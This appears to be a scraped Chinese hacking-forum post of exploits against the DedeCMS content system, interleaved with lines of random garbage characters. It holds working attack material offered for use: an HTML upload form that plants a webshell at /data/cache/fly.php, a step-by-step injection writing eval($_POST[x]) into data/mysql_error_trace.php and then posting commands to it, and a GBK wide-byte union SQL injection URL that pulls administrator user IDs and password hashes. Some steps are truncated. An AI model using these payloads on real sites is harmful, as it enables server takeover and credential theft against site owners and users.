<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<!-- newname: file name to save as; combined with activepath gives /data/cache/fly.php -->
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
/ r" E4 X5 w/ r+ z
' H$ |* }0 _1 D! R6 H$ q: H+ m* f. m) N% E: G$ W0 V* Z& N8 n o- U
. V( W' Q3 z) {' n
3 w3 l; y' L8 d! ~( j5 T: A `1 z- ]! F
: v* c* ?8 T8 H+ c, N5 d# G( K
6 } W% E( u, m* d/ P" _; d3 |
7 A/ Q+ ?0 w" |1 w, S* u6 z) N; _! q l( {) @
/ Z; @6 n/ F S
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了 MySQL 数值字段溢出会引发错误,以及 DEDECMS 用 PHP 文件(data/mysql_error_trace.php)记录数据库错误信息、且该文件头部没有做防执行处理的问题:错误日志里会原样写入出错的 SQL,其中由 mid 参数带入的 */eval($_POST[x]);var_dump(3);?> 就成了可执行的 PHP。
1. 访问网址:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
(原帖 URL 被论坛截断;从第 2 步的报错可知 id 参数值为 1024e1024,%65 即字母 e。)
可看见错误信息
6 T4 h# L; b& W: H
# X' Z$ `7 q ^8 I5 y' Y& _( p4 G. R" V* L# b9 C9 ?3 g" t
2. 访问 http://www.abc.com/data/mysql_error_trace.php ,看到以下信息即证明注入成功(开头的 int(3) 正是 var_dump(3) 的输出,说明日志文件已被当作 PHP 执行):
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3 ?% l7 M q3 K% m1 @
) s: R" T2 }' c
3. 执行 dede.rar 里的文件 test.html,注意 form 中 action 的地址是(原帖只贴出了 form 开始标签,表单字段缺失;按第 1 步的 payload,应以 POST 参数 x 提交要执行的 PHP 代码):

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

按确定后看到第 2 步骤的信息,表示文件木马上传成功。
8 d; v3 |7 I4 f* f: F8 M& h& e
0 M) x% Q# q; j
7 P d* X0 q9 w- [! Z
+ J. A; D. l4 B3 s& z- d& l% O: i! K, |/ a D1 p% H$ p( ?
u: m6 S9 ~2 H) E- P, H
3 n; l0 {0 ~, C m2 n; z4 U$ Z9 P4 v' f0 G
' S1 g1 _! H+ i% u$ C4 J+ {+ q, c
( n7 O+ L9 V2 x. O
织梦(DedeCms)plus/infosearch.php 文件注入漏洞(q 参数,宽字节 + union 注入)
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
说明:%cf 是 GBK 首字节,与转义单引号时加上的反斜杠合并成一个双字节字符,使后面的 ' 逃逸;随后的 union 直接取 dede_admin 的 userid、pwd,末尾 /* 注释掉原语句剩余部分。
|